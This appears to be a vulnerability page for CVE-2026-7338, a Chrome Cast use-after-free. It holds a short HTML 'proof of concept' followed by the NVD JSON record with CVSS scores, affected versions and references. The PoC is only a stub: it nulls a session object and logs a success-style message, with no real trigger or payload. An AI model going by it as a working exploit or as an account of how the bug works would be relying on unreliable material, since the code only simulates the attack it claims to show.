CVE-2026-7338

<!-- // Conceptual Proof of Concept for CVE-2026-7338 // Target: Google Chrome Cast Component (UAF) // Context: Attacker on local network segment --> <html> <head><title>Chrome Cast UAF PoC</title></head> <body> <script> function attemptExploit() { try { // Check if Cast API is available if (window.chrome && window.chrome.cast) { // Simulate the sequence that triggers the Use-After-Free // Step 1: Initialize Cast session var session = new window.chrome.cast.Session(); // Step 2: Force object invalidation (simulated) // In a real scenario, specific network traffic would corrupt the heap session = null; // Step 3: Trigger access to freed memory // Malicious payload construction would happen here console.log("[+] Triggering UAF condition..."); } else { console.log("Cast API not found in this environment."); } } catch (e) { console.log("Exploit attempt failed: " + e.message); } } setInterval(attemptExploit, 1000); </script> <p>Check console for PoC execution status.</p> </body> </html>

{"cve": {"id": "CVE-2026-7338", "sourceIdentifier": "[email protected]", "published": "2026-04-28T23:16:21.370", "lastModified": "2026-04-30T18:28:23.367", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Use after free in Cast in Google Chrome prior to 147.0.7727.138 allowed an attacker on the local network segment to potentially exploit heap corruption via malicious network traffic. (Chromium security severity: High)"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding": "147.0.7727.138", "matchCriteriaId": "162EE53D-80A0-4153-B6D6-B2EF01E0BDAE"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://chromereleases.googleblog.com/2026/04/stable-channel-update-for-desktop_28.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://issues.chromium.org/issues/502449857", "source": "[email protected]", "tags": ["Permissions Required"]}]}}